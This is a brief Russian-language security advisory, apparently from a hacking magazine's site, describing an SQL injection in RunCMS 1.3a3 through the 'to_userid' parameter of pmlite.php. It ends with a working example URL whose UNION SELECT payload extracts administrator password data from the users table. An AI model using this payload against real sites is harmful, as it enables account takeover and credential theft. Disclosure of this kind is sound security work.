Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
Программа: RunCMS 1.3a3, возможно более ранние версии
Уязвимость существует из-за недостаточной обработки входных данных в параметре "to_userid"
в сценарии "/modules/messages/pmlite.php". Удаленный пользователь может с
помощью специально сформированного запроса выполнить произвольные SQL команды в
базе данных приложения.
Пример:
http://victim/modules/messages/pmlite.php?send=2&to_userid=-1%20union%20%20%20%20select%20pass%20from%20runcms_users%20where%20level=5